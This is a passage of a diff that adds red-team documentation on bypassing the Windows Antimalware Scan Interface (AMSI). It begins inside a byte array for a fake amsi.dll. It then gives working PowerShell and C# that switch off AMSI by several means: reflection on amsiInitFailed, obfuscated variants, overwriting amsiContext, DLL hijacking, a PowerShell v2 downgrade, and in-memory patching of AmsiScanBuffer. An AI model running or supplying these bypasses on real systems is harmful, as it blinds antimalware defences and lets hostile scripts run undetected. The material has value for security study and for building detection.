0 116 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 12 0 0 0 20 0 0 0 184 34 0 0 184 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 13 0 0 0 68 2 0 0 204 34 0 0 204 22 0 0 0 0 0 0 136 29 62 87 0 0 0 0 14 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 148 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 248 32 0 128 1 0 0 0 0 33 0 128 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 82 83 68 83 42 80 223 113 29 247 64 69 188 37 18 40 145 144 25 190 50 0 0 0 67 58 92 68 101 118 101 108 111 112 109 101 110 116 92 65 109 115 105 92 120 54 52 92 82 101 108 101 97 115 101 92 65 109 115 105 46 112 100 98 0 0 0 0 0 0 0 0 18 0 0 0 18 0 0 0 1 0 0 0 17 0 0 0 71 67 84 76 0 16 0 0 63 14 0 0 46 116 101 120 116 36 109 110 0 0 0 0 64 30 0 0 18 0 0 0 46 116 101 120 116 36 109 110 36 48 48 0 82 30 0 0 129 0 0 0 46 116 101 120 116 36 120 0 0 32 0 0 248 0 0 0 46 105 100 97 116 97 36 53 0 0 0 0 248 32 0 0 16 0 0 0 46 48 48 99 102 103 0 0 8 33 0 0 8 0 0 0 46 67 82 84 36 88 67 65 0 0 0 0 16 33 0 0 8 0 0 0 46 67 82 84 36 88 67 90 0 0 0 0 24 33 0 0 8 0 0 0 46 67 82 84 36 88 73 65 0 0 0 0 32 33 0 0 8 0 0 0 46 67 82 84 36 88 73 90 0 0 0 0 40 33 0 0 8 0 0 0 46 67 82 84 36 88 80 65 0 0 0 0 48 33 0 0 8 0 0 0 46 67 82 84 36 88 80 90 0 0 0 0 56 33 0 0 8 0 0 0 46 67 82 84 36 88 84 65 0 0 0 0 64 33 0 0 8 0 0 0 46 67 82 84 36 88 84 90 0 0 0 0 80 33 0 0 36 1 0 0 46 114 100 97 116 97 0 0 116 34 0 0 156 2 0 0 46 114 100 97 116 97 36 122 122 122 100 98 103 0 0 0 16 37 0 0 8 0 0 0 46 114 116 99 36 73 65 65 0 0 0 0 24 37 0 0 8 0 0 0 46 114 116 99 36 73 90 90 0 0 0 0 32 37 0 0 8 0 0 0 46 114 116 99 36 84 65 65 0 0 0 0 40 37 0 0 8 0 0 0 46 114 116 99 36 84 90 90 0 0 0 0 48 37 0 0 60 1 0 0 46 120 100 97 116 97 0 0 108 38 0 0 60 0 0 0 46 105 100 97 116 97 36 50 0 0 0 0 168 38 0 0 20 0 0 0 46 105 100 97 116 97 36 51 0 0 0 0 192 38 0 0 248 0 0 0 46 105 100 97 116 97 36 52 0 0 
0 0 184 39 0 0 200 2 0 0 46 105 100 97 116 97 36 54 0 0 0 0 0 48 0 0 52 0 0 0 46 100 97 116 97 0 0 0 64 48 0 0 0 6 0 0 46 98 115 115 0 0 0 0 0 64 0 0 176 1 0 0 46 112 100 97 116 97 0 0 0 80 0 0 16 0 0 0 46 103 102 105 100 115 36 121 0 0 0 0 0 96 0 0 88 0 0 0 46 114 115 114 99 36 48 49 0 0 0 0 96 96 0 0 128 1 0 0 46 114 115 114 99 36 48 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 17 21 8 0 21 116 9 0 21 100 7 0 21 52 6 0 21 50 17 224 236 29 0 0 1 0 0 0 207 16 0 0 92 17 0 0 82 30 0 0 0 0 0 0 17 15 6 0 15 100 8 0 15 52 6 0 15 50 11 112 236 29 0 0 1 0 0 0 246 17 0 0 20 18 0 0 105 30 0 0 0 0 0 0 1 6 2 0 6 50 2 80 1 20 8 0 20 100 8 0 20 84 7 0 20 52 6 0 20 50 16 112 9 26 6 0 26 52 15 0 26 114 22 224 20 112 19 96 236 29 0 0 1 0 0 0 102 18 0 0 54 19 0 0 133 30 0 0 54 19 0 0 1 6 2 0 6 82 2 80 1 9 1 0 9 98 0 0 1 8 4 0 8 114 4 112 3 96 2 48 9 4 1 0 4 34 0 0 236 29 0 0 1 0 0 0 215 23 0 0 101 24 0 0 187 30 0 0 101 24 0 0 1 2 1 0 2 80 0 0 1 4 1 0 4 66 0 0 1 6 2 0 6 50 2 48 1 13 4 0 13 52 10 0 13 114 6 80 1 13 4 0 13 52 9 0 13 50 6 80 1 21 5 0 21 52 186 0 21 1 184 0 6 80 0 0 1 15 6 0 15 100 7 0 15 52 6 0 15 50 11 112 1 13 4 0 13 52 7 0 13 50 6 80 0 0 0 0 1 0 0 0 56 39 0 0 0 0 0 0 0 0 0 0 62 40 0 0 120 32 0 0 104 39 0 0 0 0 0 0 0 0 0 0 6 41 0 0 168 32 0 0 192 38 0 0 0 0 0 0 0 0 0 0 114 42 0 0 0 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 106 41 0 0 0 0 0 0 86 41 0 0 0 0 0 0 60 41 0 0 0 0 0 0 40 41 0 0 0 0 0 0 164 41 0 0 0 0 0 0 94 42 0 0 0 0 0 0 72 42 0 0 0 0 0 0 46 42 0 0 0 0 0 0 24 42 0 0 0 0 0 0 2 42 0 0 0 0 0 0 232 41 0 0 0 0 0 0 204 41 0 0 0 0 0 0 184 41 0 0 0 0 0 0 134 41 0 0 0 0 0 0 0 0 0 0 0 0 0 0 52 40 0 0 0 0 0 0 20 40 0 0 0 0 0 0 252 39 0 0 0 0 0 0 218 39 0 0 0 0 0 0 184 39 0 0 0 0 0 0 0 0 0 0 0 0 0 0 252 40 0 0 0 0 0 0 238 40 0 0 0 0 0 0 214 40 0 0 0 0 0 0 186 40 0 0 0 0 0 0 158 40 0 0 0 0 0 0 124 40 0 0 0 0 0 0 106 40 0 0 0 0 0 0 92 40 0 0 0 0 0 0 80 40 0 0 0 0 0 0 0 0 0 0 0 0 0 0 40 0 95 95 116 101 108 101 109 101 116 
114 121 95 109 97 105 110 95 105 110 118 111 107 101 95 116 114 105 103 103 101 114 0 41 0 95 95 116 101 108 101 109 101 116 114 121 95 109 97 105 110 95 114 101 116 117 114 110 95 116 114 105 103 103 101 114 0 8 0 95 95 67 95 115 112 101 99 105 102 105 99 95 104 97 110 100 108 101 114 0 0 37 0 95 95 115 116 100 95 116 121 112 101 95 105 110 102 111 95 100 101 115 116 114 111 121 95 108 105 115 116 0 0 62 0 109 101 109 115 101 116 0 0 86 67 82 85 78 84 73 77 69 49 52 48 46 100 108 108 0 0 54 0 95 105 110 105 116 116 101 114 109 0 55 0 95 105 110 105 116 116 101 114 109 95 101 0 63 0 95 115 101 104 95 102 105 108 116 101 114 95 100 108 108 0 51 0 95 105 110 105 116 105 97 108 105 122 101 95 110 97 114 114 111 119 95 101 110 118 105 114 111 110 109 101 110 116 0 0 52 0 95 105 110 105 116 105 97 108 105 122 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 0 60 0 95 114 101 103 105 115 116 101 114 95 111 110 101 120 105 116 95 102 117 110 99 116 105 111 110 0 34 0 95 101 120 101 99 117 116 101 95 111 110 101 120 105 116 95 116 97 98 108 101 0 30 0 95 99 114 116 95 97 116 101 120 105 116 0 22 0 95 99 101 120 105 116 0 0 97 112 105 45 109 115 45 119 105 110 45 99 114 116 45 114 117 110 116 105 109 101 45 108 49 45 49 45 48 46 100 108 108 0 174 4 82 116 108 67 97 112 116 117 114 101 67 111 110 116 101 120 116 0 181 4 82 116 108 76 111 111 107 117 112 70 117 110 99 116 105 111 110 69 110 116 114 121 0 0 188 4 82 116 108 86 105 114 116 117 97 108 85 110 119 105 110 100 0 0 146 5 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 0 82 5 83 101 116 85 110 104 97 110 100 108 101 100 69 120 99 101 112 116 105 111 110 70 105 108 116 101 114 0 15 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 0 112 5 84 101 114 109 105 110 97 116 101 80 114 111 99 101 115 115 0 0 112 3 73 115 80 114 111 99 101 115 115 111 114 70 101 97 116 117 114 101 80 114 101 115 101 110 116 0 48 4 81 117 101 114 121 80 101 114 102 111 114 109 
97 110 99 101 67 111 117 110 116 101 114 0 16 2 71 101 116 67 117 114 114 101 110 116 80 114 111 99 101 115 115 73 100 0 20 2 71 101 116 67 117 114 114 101 110 116 84 104 114 101 97 100 73 100 0 0 221 2 71 101 116 83 121 115 116 101 109 84 105 109 101 65 115 70 105 108 101 84 105 109 101 0 84 3 73 110 105 116 105 97 108 105 122 101 83 76 105 115 116 72 101 97 100 0 106 3 73 115 68 101 98 117 103 103 101 114 80 114 101 115 101 110 116 0 75 69 82 78 69 76 51 50 46 100 108 108 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 50 162 223 45 153 43 0 0 205 93 32 210 102 212 255 255 255 255 255 255 0 0 0 0 1 0 0 0 2 0 0 0 47 32 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 16 0 0 65 16 0 0 48 37 0 0 68 16 0 0 148 16 0 0 16 38 0 0 148 16 0 0 191 17 0 0 52 37 0 0 192 17 0 0 66 18 0 0 96 37 0 0 68 18 0 0 76 19 0 0 164 37 0 0 76 19 0 0 160 19 0 0 144 37 0 0 160 19 0 0 221 19 0 0 72 38 0 0 224 19 0 0 20 20 0 0 24 38 0 0 20 20 0 0 229 20 0 0 212 37 0 0 232 20 0 0 89 21 0 0 220 37 0 0 92 21 0 0 149 21 0 0 16 38 0 0 152 21 0 0 184 21 0 0 16 38 0 0 184 21 0 0 205 21 0 0 16 38 0 0 208 21 0 0 248 21 0 0 16 38 0 0 248 21 0 0 13 22 0 0 16 38 0 0 16 22 0 0 113 22 0 0 144 37 0 0 116 22 0 0 164 22 0 0 16 38 0 0 164 22 0 0 184 22 0 0 16 38 0 0 184 22 0 0 1 23 0 0 24 38 0 0 4 23 0 0 205 23 0 0 32 38 0 0 208 23 0 0 108 24 0 0 232 37 0 0 108 24 0 0 144 24 0 0 24 38 0 0 144 24 0 0 187 24 0 0 24 38 0 0 188 24 0 0 11 25 0 0 24 38 0 0 12 25 0 0 35 25 0 0 16 38 0 0 36 25 0 0 208 25 0 0 44 38 0 0 252 25 0 0 23 26 0 0 16 38 0 0 32 26 0 0 101 27 0 0 56 38 0 0 104 27 0 0 178 27 0 0 72 38 0 0 180 27 0 0 254 27 0 0 72 38 0 0 8 28 0 0 201 29 0 0 88 38 0 0 80 30 0 0 82 30 0 0 104 38 0 0 82 30 0 0 105 30 0 0 136 37 0 0 105 30 0 0 133 30 0 0 136 37 0 0 133 30 0 0 187 30 0 0 204 37 0 0 187 30 0 0 211 30 0 0 8 38 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 54 0 0 0 73 0 0 0 76 0 0 0 11 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 24 0 0 0 24 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 2 0 0 0 48 0 0 128 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 9 4 0 0 72 0 0 0 96 96 0 0 125 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 
105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 24 0 0 0 248 160 0 161 88 161 96 161 56 162 80 162 88 162 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0" + + if (([IntPtr]::Size) -eq 8) + { + Write-Verbose "64 bit process detected." + $DllBytes = $AmsiX64 + } + elseif (([IntPtr]::Size) -eq 4) + { + Write-Verbose "32 bit process detected." + $DllBytes = $AmsiX86 + } + + switch($method) + { + + "unload" + { + Write-Verbose "Using Matt Graeber's Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true)' + } + else + { + Write-Output "Executing the bypass." 
+ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) + } + } + + "unloadsilent" + { + Write-Verbose "Using Matt Graeber's Reflection method with WMF5 autologging bypass." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags'')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType(''System.T''+''ype'')), [Object]([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'')),(''GetFie''+''ld'')).Invoke(''amsiInitFailed'',((''Non''+''Public,Static'') -as [String].Assembly.GetType(''System.Reflection.Bindin''+''gFlags''))).SetValue($null,$True)' + } + else + { + Write-Output "Executing the bypass." + [Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True) + } + } + + "unloadobfuscated" + { + Write-Verbose "Using Matt Graeber's Reflection method with obfuscation from Daneil Bohannon's Invoke-Obfuscation - which bypasses WMF5 autologging." 
+ if ($ShowOnly -eq $True) + { + $code = @" +Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) +"@ + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output $code + } + else + { + Write-Output "Executing the bypass." + Sv ('R9'+'HYt') ( " ) )93]rahC[]gnirtS[,'UCS'(ecalpeR.)63]rahC[]gnirtS[,'aEm'(ecalpeR.)')eurt'+'aEm,llun'+'aEm(eulaVt'+'eS'+'.)UCScit'+'atS,ci'+'lbuPnoNUCS'+',U'+'CSdeli'+'aFt'+'inI'+'is'+'maUCS('+'dle'+'iF'+'teG'+'.'+')'+'UCSslitU'+'is'+'mA.noitamotu'+'A.tn'+'em'+'eganaM.'+'m'+'e'+'t'+'sySUCS(epy'+'TteG.ylbmessA'+'.]'+'feR['( (noisserpxE-ekovnI" ); Invoke-Expression( -Join ( VaRIAbLe ('R9'+'hyT') -val )[ - 1..- (( VaRIAbLe ('R9'+'hyT') -val ).Length)]) + + } + } + + "unload2" + { + Write-Verbose "Using Matt Graeber's second Reflection method." + if ($ShowOnly -eq $True) + { + Write-Output "Use the following scriptblock before you run a script which gets detected." + Write-Output '[Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType(''System.Management.Automation.AmsiUtils'').GetField(''amsiContext'',[Reflection.BindingFlags]''NonPublic,Static'').GetValue($null),0x41414141)' + } + else + { + Write-Output "Executing the bypass." + [Runtime.InteropServices.Marshal]::WriteInt32([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').GetValue($null),0x41414141) + } + } + + "dllhijack" + { + Write-Verbose "Using Cornelis de Plaa's DLL hijack method." 
+ if ($ShowOnly -eq $True) + { + Write-Output "Copy powershell.exe from C:\Windows\System32\WindowsPowershell\v1.0 to a local folder and dropa fake amsi.dll in the same directory." + Write-Output "Run the new powershell.exe and AMSI should be gone for that session." + } + else + { + [Byte[]] $temp = $DllBytes -split ' ' + Write-Output "Executing the bypass." + Write-Verbose "Dropping the fake amsi.dll to disk." + [System.IO.File]::WriteAllBytes("$pwd\amsi.dll", $temp) + + Write-Verbose "Copying powershell.exe to the current working directory." + Copy-Item -Path C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Destination $pwd + + Write-Verbose "Starting powershell.exe from the current working directory." + & "$pwd\powershell.exe" + + } + } + + "psv2" + { + Write-Verbose "Using PowerShell version 2 which doesn't support AMSI." + if ($ShowOnly -eq $True) + { + Write-Output "If .Net version 2.0.50727 is installed, run powershell -v 2 and run scripts from the new PowerShell process." + } + else + { + Write-Verbose "Checking if .Net version 2.0.50727 is installed." + $versions = Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | Get-ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '^(?!S)\p{L}'} | Select -ExpandProperty Version + if($versions -match "2.0.50727") + { + Write-Verbose ".Net version 2.0.50727 found." + Write-Output "Executing the bypass." + powershell.exe -version 2 + } + else + { + Write-Verbose ".Net version 2.0.50727 not found. Can't start PowerShell v2." + } + } + } + + "obfuscation" + { + Write-Output "AMSI and the AVs which support it can be bypassed using obfuscation techqniues." + Write-Output "ISE-Steroids (http://www.powertheshell.com/isesteroidsmanual/download/) and Invoke-Obfuscation can be used (https://github.com/danielbohannon/Invoke-Obfuscation)." 
+ } + } + +} +``` + + +## Adam Chester Patch + +Bypass Update by Adam Chester https://twitter.com/_xpn_/status/1170852932650262530 + +```ps1 +$Winpatch = @" +using System; +using System.Runtime.InteropServices; + +public class patch +{ + // https://twitter.com/_xpn_/status/1170852932650262530 + static byte[] x64 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 }; + static byte[] x86 = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC2, 0x18, 0x00 }; + + public static void it() + { + if (is64Bit()) + PatchAmsi(x64); + else + PatchAmsi(x86); + } + + private static void PatchAmsi(byte[] patch) + { + try + { + var lib = Win32.LoadLibrary("a" + "ms" + "i.dll"); + var addr = Win32.GetProcAddress(lib, "AmsiScanBuffer"); + + uint oldProtect; + Win32.VirtualProtect(addr, (UIntPtr)patch.Length, 0x40, out oldProtect); + + Marshal.Copy(patch, 0, addr, patch.Length); + Console.WriteLine("Patch Sucessfull"); + } + catch (Exception e) + { + Console.WriteLine(" [x] {0}", e.Message); + Console.WriteLine(" [x] {0}", e.InnerException); + } + } + + private static bool is64Bit() + { + bool is64Bit = true; + + if (IntPtr.Size == 4) + is64Bit = false; + + return is64Bit; + } +} + +class Win32 +{ + [DllImport("kernel32")] + public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); + + [DllImport("kernel32")] + public static extern IntPtr LoadLibrary(string name); + + [DllImport("kernel32")] + public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); +} +"@ + +Add-Type -TypeDefinition $Winpatch -Language CSharp +[patch]::it() +``` + +## Other interesting AMSI bypass + +* [tihanyin/PSSW100AVB/AMSI_bypass_2021_09.ps1](https://github.com/tihanyin/PSSW100AVB/blob/main/AMSI_bypass_2021_09.ps1) + ```ps1 + $A="5492868772801748688168747280728187173688878280688776828" + $B="1173680867656877679866880867644817687416876797271" + [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " 
" ).GetField([string](38..51|%{[char][int](29+($A+$B).substring(($_*2),2))})-replace " ",'Non' + 'Public,Static').SetValue($null,$true) + ``` + +## AMSI.fail + +> AMSI.fail generates obfuscated PowerShell snippets that break or disable AMSI for the current process. The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures. - https://amsi.fail/ + + +## References + +* [S3cur3Th1sSh1t - Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell/blob/master/README.md) \ No newline at end of file diff --git a/docs/redteam/Windows - DPAPI.md b/docs/redteam/Windows - DPAPI.md new file mode 100644 index 0000000..48252d6 --- /dev/null +++ b/docs/redteam/Windows - DPAPI.md 
